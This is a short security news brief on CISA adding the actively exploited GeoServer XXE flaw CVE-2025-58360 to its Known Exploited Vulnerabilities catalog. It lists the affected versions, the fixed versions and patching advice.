CISA Warns of Active GeoServer XXE Exploits

CISA has added a high-severity OSGeo GeoServer flaw to its Known Exploited Vulnerabilities (KEV) catalog after evidence of in-the-wild abuse, urging immediate patching by affected organizations.

Key vulnerability details

• ID and severity: CVE-2025-58360 (CVSS 8.2), unauthenticated XML External Entity (XXE)
• Affected software: OSGeo GeoServer
• Discovery credit: AI-powered platform XBOW
• Vulnerable endpoint: /geoserver/wms GetMap operation that accepts XML input and can process external entities

Affected versions and packages

• Versions: All releases prior to and including 2.25.5, and 2.26.0 through 2.26.1
• Fixed in: 2.25.6, 2.26.2, 2.27.0, 2.28.0, and 2.28.1
• Impacted packages:
  • docker.osgeo.org/geoserver
  • org.geoserver.web:gs-web-app (Maven)
  • org.geoserver:gs-wms (Maven)

Risk and impact

• Arbitrary file read from the server filesystem
• Server-Side Request Forgery (SSRF) to internal services
• Denial-of-service (DoS) via resource exhaustion

Exploitation status

• Specific attack details are not public, but the Canadian Centre for Cyber Security reported on November 28, 2025 that an exploit for CVE-2025-58360 is active in the wild.
• Context: A separate critical GeoServer issue, CVE-2024-36401 (CVSS 9.8), has been widely exploited over the past year.

Recommended actions

• Patch immediately to one of the fixed versions (2.25.6, 2.26.2, 2.27.0, 2.28.0, or 2.28.1)
• Update affected Docker images and Maven dependencies listed above
• Reduce exposure of WMS endpoints and validate XML inputs
• Disable external entity resolution in XML parsers where possible
• Monitor for suspicious GetMap XML requests, SSRF attempts, and unusual resource usage
• Federal Civilian Executive Branch (FCEB) agencies should complete remediation by January 1, 2026

Source: The Hacker News